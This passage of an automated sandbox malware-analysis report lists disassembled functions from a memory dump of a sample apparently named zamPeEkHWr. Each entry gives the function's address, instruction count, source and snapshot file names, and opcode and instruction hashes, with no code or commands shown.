                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6839130164cfc16190dab4b99beb4b048e922fdb3adf44d594a455a835afa60
                                                  • Instruction ID: 013a565dcd91ec2018b5413534705f6d9e01f3ceaf8c01d73f159f9dd5ef067c
                                                  • Opcode Fuzzy Hash: a6839130164cfc16190dab4b99beb4b048e922fdb3adf44d594a455a835afa60
                                                  • Instruction Fuzzy Hash: 19216031719D084FD7ACEA1CD859A7577E1FBAD310B1501AEE04EC36A6EE25EC46C780
                                                  Function 00007FFD9B8796A4 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3125509cac3c3d0aa0744b8011ae922631dfaf56dd36b6270ecdaad32566c718
                                                  • Instruction ID: 58e234f578cd8a8aef8f4da17c7d00f771ecda880c216cd75ce0bf939ea5b6c9
                                                  • Opcode Fuzzy Hash: 3125509cac3c3d0aa0744b8011ae922631dfaf56dd36b6270ecdaad32566c718
                                                  • Instruction Fuzzy Hash: 93219204B0990F4FEF5EB7A8A4756BC9582DF89608F1404B8E02ED32DBDF2DA9029641
                                                  Function 00007FFD9B877569 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21ae845d5461ae594fd0205e508e0902befcfeaf4078512e609dd152079a4d11
                                                  • Instruction ID: 8956c6661e363069d2e6d841f364d036849ded3c9697ae745a667b32bdec5908
                                                  • Opcode Fuzzy Hash: 21ae845d5461ae594fd0205e508e0902befcfeaf4078512e609dd152079a4d11
                                                  • Instruction Fuzzy Hash: 6A210B51F0DA890FEB59E77C48A966877E1EFA8344B0540FBE05DC71EBEC18A805C341
                                                  Function 00007FFD9B87E4FA Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eb416a182bdaf086f3ec614bbe23e9bcf3dc97848b0fc302dce95abf260ce8dd
                                                  • Instruction ID: 08d00ab09f9dcfdbc6842dcde3716592343f3e3fc02d8ced2788e65407acaba1
                                                  • Opcode Fuzzy Hash: eb416a182bdaf086f3ec614bbe23e9bcf3dc97848b0fc302dce95abf260ce8dd
                                                  • Instruction Fuzzy Hash: C9212F31608A0E4FDB88EF58D4A57A973D1FF98314F500569E52EC72C6DE35E852C781
                                                  Function 00007FFD9B8898BC Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f95d17b6b7dfeee81a642efc4c761efa62edf6aeb929b508723c61c199b57297
                                                  • Instruction ID: 573a1890a61dd822401e8a92caafcc36d90bcdd248ac38e3775b8aaa7a74d900
                                                  • Opcode Fuzzy Hash: f95d17b6b7dfeee81a642efc4c761efa62edf6aeb929b508723c61c199b57297
                                                  • Instruction Fuzzy Hash: 80216621B1DF8D0FE339676858245A677E4EF49360F0105BFE4AEC30C3DD2869028391
                                                  Function 00007FFD9B8849EC Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d959982677b77ff3c17c5999bf1605639f5c30437858fff67f9d6d9986edc94
                                                  • Instruction ID: def604923092bfeba50dc6dd4efe4b662995d1adce30245e3a8850a456a56f35
                                                  • Opcode Fuzzy Hash: 6d959982677b77ff3c17c5999bf1605639f5c30437858fff67f9d6d9986edc94
                                                  • Instruction Fuzzy Hash: AE216A72B1DF464BE31D5B2C68662B477D2EBA8740B0A81BFE019C72E7EC355C028285
                                                  Function 00007FFD9B883764 Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e939a8216aa1ad7ca6a1d747a63f32382d148a6c186b0892ee37a77b641a2c4a
                                                  • Instruction ID: 3be34264139ef705ab75987c2349085af8aba52d97a20ad2ef5005e5c00ddde7
                                                  • Opcode Fuzzy Hash: e939a8216aa1ad7ca6a1d747a63f32382d148a6c186b0892ee37a77b641a2c4a
                                                  • Instruction Fuzzy Hash: B5312170715A4E8FDBD8DF18C894AA573E2FF5C305B604569E82EC7295CB31E952CB40
                                                  Function 00007FFD9B879A22 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5da6a36890d15bac23c80af105ba7ffd565ec3a3dd05c767eb9b59eb273f3484
                                                  • Instruction ID: c702d771a8b8ce1e8f4d76b55d0e8e31309059b9185ab1fb284858337f4c09cd
                                                  • Opcode Fuzzy Hash: 5da6a36890d15bac23c80af105ba7ffd565ec3a3dd05c767eb9b59eb273f3484
                                                  • Instruction Fuzzy Hash: 2321A104B0981E8FEE5F76E8F1755BC58469F8A608F1408B8E13FD27CBCF2DA5029545
                                                  Function 00007FFD9B8898E9 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b547ad7aa6e5d1de1e564a512d10bfaf69e15929627e0e86941d49244c714c68
                                                  • Instruction ID: b430fef2f52c161ec8a53eacf29b1408ef8f5e6eb0ebeab27d53348d17fa42e3
                                                  • Opcode Fuzzy Hash: b547ad7aa6e5d1de1e564a512d10bfaf69e15929627e0e86941d49244c714c68
                                                  • Instruction Fuzzy Hash: 16214921A5EB8A0FD32953A818655F63BD4DF4A360B0505BFE4EAC34D3DC1D69038391
                                                  Function 00007FFD9B889609 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76a1b6c14ec02de39d282d006f4e747ae1e86d16597a91855e9215ff106368d5
                                                  • Instruction ID: 64d3850c62d583429b322b0ee317532aca350604752671aa447dea92f6b2bb4f
                                                  • Opcode Fuzzy Hash: 76a1b6c14ec02de39d282d006f4e747ae1e86d16597a91855e9215ff106368d5
                                                  • Instruction Fuzzy Hash: AE310230A0DB8D4FDB91DF68C8696A97FF0FF59300F0606ABD458D72A2D638A945C781
                                                  Function 00007FFD9B8B0240 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9e671e179b217377ae149f039afae5afa5f1cba3f131984e036ae210a483326
                                                  • Instruction ID: f8478725758c8c669b1ad74a3e3efaf9f13538cfbc904e629998acc1b999cfa8
                                                  • Opcode Fuzzy Hash: c9e671e179b217377ae149f039afae5afa5f1cba3f131984e036ae210a483326
                                                  • Instruction Fuzzy Hash: 08213721B2DE1F0FEABADA6D44646B673C1EB5C710B014579E04EC36B2DD24FD068780
                                                  Function 00007FFD9B87164A Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b44ac463a452be2031509be8dc081bc9e268e7adfd6958383546449bb23c12a1
                                                  • Instruction ID: 6a747b28943ee07f8f42c34abdb2ed17db8e196688e31f2b42e049052b6fea57
                                                  • Opcode Fuzzy Hash: b44ac463a452be2031509be8dc081bc9e268e7adfd6958383546449bb23c12a1
                                                  • Instruction Fuzzy Hash: 5E214931B2CA4D0FE7A4E77C546A67477D2EF8C614B1501FAE40CC32A3DD189C428381
                                                  Function 00007FFD9B884201 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a5ef8e2d593f04131f426120e6b9394fb9afb8da2352fbcb86c47e08b6bb8ada
                                                  • Instruction ID: 7ec5d735c14c2705f894e479ab674acf09d21834db382919b2144c7e8e64581c
                                                  • Opcode Fuzzy Hash: a5ef8e2d593f04131f426120e6b9394fb9afb8da2352fbcb86c47e08b6bb8ada
                                                  • Instruction Fuzzy Hash: 3C312F71715A4E8FDB98DF18C8A4AA573E2FF9C305B50456DD82ECB2A1CB35E852CB40
                                                  Function 00007FFD9B879612 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59ec1b09f0bf173bb2bff3bfc546f531cbe0c27ad3fb0fb80dc26f4816a7cd3e
                                                  • Instruction ID: 343faebd9778e4f75b0efb42afaa83ded1f53490149e0d6344a051653c58d0ad
                                                  • Opcode Fuzzy Hash: 59ec1b09f0bf173bb2bff3bfc546f531cbe0c27ad3fb0fb80dc26f4816a7cd3e
                                                  • Instruction Fuzzy Hash: A5217104B18D4E4FEB5FB7A8A0756BC5982DF89208F1444B8D12ED36DBDF2DA9028641
                                                  Function 00007FFD9B883260 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08ecafe9eb863887b10a7cddf90cadadae817a05f597b6c0bcb4900ed19c0279
                                                  • Instruction ID: b4c7a5e8f3c2eca2cf5547ee112270888d5a106bc49abf9afe018be9c810daf4
                                                  • Opcode Fuzzy Hash: 08ecafe9eb863887b10a7cddf90cadadae817a05f597b6c0bcb4900ed19c0279
                                                  • Instruction Fuzzy Hash: 1321B537E0AC5E4BFB70E7A498216F972D5EF89351F1A013ED42DC3092EE396A1A4581
                                                  Function 00007FFD9B877580 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a79ab2766a5939c260d2d8f7484551d04a87e01370cdfbb84326669fe363eef
                                                  • Instruction ID: fa5e6cfd8537a4500e4e512989b0da60b87196a77ab531ad44a468243a22fdda
                                                  • Opcode Fuzzy Hash: 4a79ab2766a5939c260d2d8f7484551d04a87e01370cdfbb84326669fe363eef
                                                  • Instruction Fuzzy Hash: C9210B51F199490BEB9CFB7C88A9B7977D2EF98344F0545BAE01DC71DBEC14A8018341
                                                  Function 00007FFD9B887B80 Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28aa75d6aabc24f61b72d70faf1be371ccf64f28bcc67fc22ec845b131d87caa
                                                  • Instruction ID: c26fbf662fe9afa712ecdcbfa040535013edd41bf25cbcd998e295d2fdd79513
                                                  • Opcode Fuzzy Hash: 28aa75d6aabc24f61b72d70faf1be371ccf64f28bcc67fc22ec845b131d87caa
                                                  • Instruction Fuzzy Hash: 41312370715A4E8FDB84DF18C894AA573F2FF98315B60456DD82ECB2A5CB31E952CB40
                                                  Function 00007FFD9B87953B Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c44ab65fbdb32f3515806fdf9bc9ece38852b31cabc8079f09390d0d429818b
                                                  • Instruction ID: c73efdd98562a7a36d1dd8abceb07380fa772321b58038e41fb3e4ec9662fd01
                                                  • Opcode Fuzzy Hash: 8c44ab65fbdb32f3515806fdf9bc9ece38852b31cabc8079f09390d0d429818b
                                                  • Instruction Fuzzy Hash: EA319E51E1EA8F5EF766E32C84783A06AD3EF9A35CF4645B5C04CC31EAED24A842D301
                                                  Function 00007FFD9B8707B8 Relevance: .1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73ce36edb91b5e028b65469c51bed4d97554f4673d6d8416a2bdcf55fefdf94f
                                                  • Instruction ID: 265cac1c69384cb97f6b0cbb22b32f4078ea40cb571b027d9d378210ab03fc14
                                                  • Opcode Fuzzy Hash: 73ce36edb91b5e028b65469c51bed4d97554f4673d6d8416a2bdcf55fefdf94f
                                                  • Instruction Fuzzy Hash: 07112932B28D4D0FEAA4F76C54AA67973C2EB8C668F1505BAF40DC32A6DC14AC414381
                                                  Function 00007FFD9B88BEF2 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a7e169356e6ebaa51f73901c1064f66cd08ba684b459018f8377ec9403acfd2
                                                  • Instruction ID: a1f78f06c91fda8e3c572548f738a09a545ed805a29402830ec28cc0045a0901
                                                  • Opcode Fuzzy Hash: 0a7e169356e6ebaa51f73901c1064f66cd08ba684b459018f8377ec9403acfd2
                                                  • Instruction Fuzzy Hash: F821A421A0AD9D0FF77597A458315B977D8EFC9310F0501B6D46CC70A3DD3A6A1A4A81
                                                  Function 00007FFD9B87FAD5 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c56275291901f266dcd55d64f0816535fe8d40f670d820620f0447200038ee2c
                                                  • Instruction ID: c2a1fee8525f398472b23bcc3f9101523e975318e69b2a2516357819b6d251fc
                                                  • Opcode Fuzzy Hash: c56275291901f266dcd55d64f0816535fe8d40f670d820620f0447200038ee2c
                                                  • Instruction Fuzzy Hash: 47213822F0E9DE4AF77497A508B12F972D0EFAD328F4605B6D41CC34E3DD186A0A56C1
                                                  Function 00007FFD9B882E42 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef0fdb02523a5d83ccb1ca2d2505c5d72efc5ef5149a19f1745400d203b9020e
                                                  • Instruction ID: 17fa7a70430dc238d9497d01576bd3e0d0cd230f235da8f7d881fb13bf63ead7
                                                  • Opcode Fuzzy Hash: ef0fdb02523a5d83ccb1ca2d2505c5d72efc5ef5149a19f1745400d203b9020e
                                                  • Instruction Fuzzy Hash: C921B336E0AD9E4BE7B19BE858215B976D0EF4D310F0601BAD46CC34E3DD386A1A8681
                                                  Function 00007FFD9B883CF2 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c49b6b7bd50355c385c1ccc6f67404ca8e7514c7de61c046b74e94578059d64d
                                                  • Instruction ID: f265b35fa08ca3249dff2698d4cb913a44795d6fe5dbae69e0e6478623316e11
                                                  • Opcode Fuzzy Hash: c49b6b7bd50355c385c1ccc6f67404ca8e7514c7de61c046b74e94578059d64d
                                                  • Instruction Fuzzy Hash: 1321B621E0ED9D4FF7B5976848252B87AE2EF49310F0601B5E46CC70E3DD286A0A4681
                                                  Function 00007FFD9B88CCD2 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d67017b71272cc729618467f17758f98f535e9c7d54422f8ad7b0ba372059f8
                                                  • Instruction ID: e002a15a4b1db307d93f7a3c9b0ff912b983261d144d9722e386ff52e05530ca
                                                  • Opcode Fuzzy Hash: 8d67017b71272cc729618467f17758f98f535e9c7d54422f8ad7b0ba372059f8
                                                  • Instruction Fuzzy Hash: DA21D622E0AD9D0FF7B5A7A448291F87AE2EF4D310F0501B6C46CC34A7DD382A0A4A81
                                                  Function 00007FFD9B88148A Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e067239c1cc3b9ede01cf533c828f525b1def1375ea7c174177bf4cdfbb6631
                                                  • Instruction ID: 5c7246cbbccace4eec04586e6dc31b84a85eef419c4e49a446a24df20c2dfb8f
                                                  • Opcode Fuzzy Hash: 5e067239c1cc3b9ede01cf533c828f525b1def1375ea7c174177bf4cdfbb6631
                                                  • Instruction Fuzzy Hash: 8621D726F0AD5E4BF774B7A458312F976D1EF4D310F460175D43EC35E2DD28AA0A4681
                                                  Function 00007FFD9B8853C2 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db6300605aef1ba5a21ec4368be86ac1cbd2cabd607595ae7b4fc14e41ceec00
                                                  • Instruction ID: b857a9d4d2070d6fc5a27921b197423432f0b63f3080b984611b07c5d8862722
                                                  • Opcode Fuzzy Hash: db6300605aef1ba5a21ec4368be86ac1cbd2cabd607595ae7b4fc14e41ceec00
                                                  • Instruction Fuzzy Hash: 1421DA71E0AD4D4BF77193A448236F976F0EF4D322F4A01B5D46CC70A3DD386A1A4681
                                                  Function 00007FFD9B88A798 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e13cd2bf1d030bb59af2aeec3842dcb188f871a5dbdc0741bc2d433b5f4325b9
                                                  • Instruction ID: 64846a8b25727e12684d5aa5e8db4491c096a147e6a1de03698b29cbc4c50bb0
                                                  • Opcode Fuzzy Hash: e13cd2bf1d030bb59af2aeec3842dcb188f871a5dbdc0741bc2d433b5f4325b9
                                                  • Instruction Fuzzy Hash: AA212A30719A199FDA68FB48C495D7673A2EB98710B25016CE04A872A2CE39FD46C794
                                                  Function 00007FFD9B88D6A2 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 414276035b79d4fde57f3d5016ca39a4deabc01874cbe0a83e131da6609bca07
                                                  • Instruction ID: 8272e1405b3b6c62e3ddfeea21d72979594439e0936b42016e1b508219cf8e90
                                                  • Opcode Fuzzy Hash: 414276035b79d4fde57f3d5016ca39a4deabc01874cbe0a83e131da6609bca07
                                                  • Instruction Fuzzy Hash: C7218022E0AD9D8BF7B1B7A448256B976E1EF49310F0601BAD47CC74A3DD286A1A4781
                                                  Function 00007FFD9B87841A Relevance: .1, Instructions: 79COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 817e83195d804cdf01d4e09f130c223f5ad50835a29d1e653f95426a693a9d7c
                                                  • Instruction ID: f0e8a8cf6c4c0809c05fad21109fc86c7575a4c8f900447ed6d936cf983abf94
                                                  • Opcode Fuzzy Hash: 817e83195d804cdf01d4e09f130c223f5ad50835a29d1e653f95426a693a9d7c
                                                  • Instruction Fuzzy Hash: 38210722F0E59E4AF7B493A548B11B876E0EF4D318F6601BAD45CC34E3DD586A1B1681
                                                  Function 00007FFD9B886882 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48bb562365d60ffe9eb24cd57a9fc8f40f2e49b9a8f33296207943ae4c075806
                                                  • Instruction ID: 004ed22038f738da4825e2bd0b3a48d143f41a9a7170ca460f0eef339f62bb83
                                                  • Opcode Fuzzy Hash: 48bb562365d60ffe9eb24cd57a9fc8f40f2e49b9a8f33296207943ae4c075806
                                                  • Instruction Fuzzy Hash: 8C21B071E0AD8E4BF7B497A45C216B976E0EF4D320F0602B6D46C835E3DE296A1A46C1
                                                  Function 00007FFD9B87945C Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f15b00713e231ef60195edaa433abab27cca112060e8241ab3d6bda14e9bfe56
                                                  • Instruction ID: ed65c113152537855822c1ca751cc7bae5d76880089a914fe74387576d5d3461
                                                  • Opcode Fuzzy Hash: f15b00713e231ef60195edaa433abab27cca112060e8241ab3d6bda14e9bfe56
